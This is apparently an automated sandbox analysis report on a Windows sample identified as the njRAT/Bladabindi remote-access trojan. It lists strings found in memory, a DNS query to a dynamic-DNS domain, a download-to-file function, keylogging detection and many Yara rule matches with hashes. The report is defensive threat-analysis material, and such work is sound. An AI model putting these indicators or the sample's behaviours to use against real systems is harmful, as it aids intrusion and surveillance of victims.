        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://onedrive.live.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://otelrules.azureedge.net
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/connectors
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://powerlift.acompli.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pushchannel.1drv.ms
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://res.cdn.office.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://res.cdn.office.net/polymer/models
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://settings.outlook.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://staging.cortana.ai
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://substrate.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://tasks.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://webshell.suite.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://wus2.contentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://www.yammer.com
        Source: unknownDNS traffic detected: queries for: bmw2022.ddns.net
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DC4B54 URLDownloadToFileW,4_2_69DC4B54
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Contains functionality to log keystrokes (.Net Source)
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, kl.cs.Net Code: VKCodeToUnicode

        E-Banking Fraud

        barindex
        Yara detected Njrat
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeCode function: 0_2_00007FFD9B88172B0_2_00007FFD9B88172B
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000230492_2_00023049
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000220562_2_00022056
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001F9FE2_2_0001F9FE
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000242522_2_00024252
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_00020BD02_2_00020BD0
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0002630E2_2_0002630E
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000273D82_2_000273D8
        Source: C:\ProgramData\essam@sasa2023.exeCode function: 3_2_01130BF03_2_01130BF0
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698ECBE64_2_698ECBE6
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A8D81C4_2_69A8D81C
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A8D0644_2_69A8D064
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A79A504_2_69A79A50
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DDA9BE4_2_69DDA9BE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DD9F124_2_69DD9F12
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DDB09F4_2_69DDB09F
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DDC00B4_2_69DDC00B
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DBE49E4_2_69DBE49E
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DDA4684_2_69DDA468
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D7F7904_2_69D7F790
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DDC65E4_2_69DDC65E
        Source: C:\ProgramData\essam@sasa2023.exeCode function: 11_2_04C10BE011_2_04C10BE0
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: sfc.dllJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: sfc.dll
        Source: ESjy0irMIn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
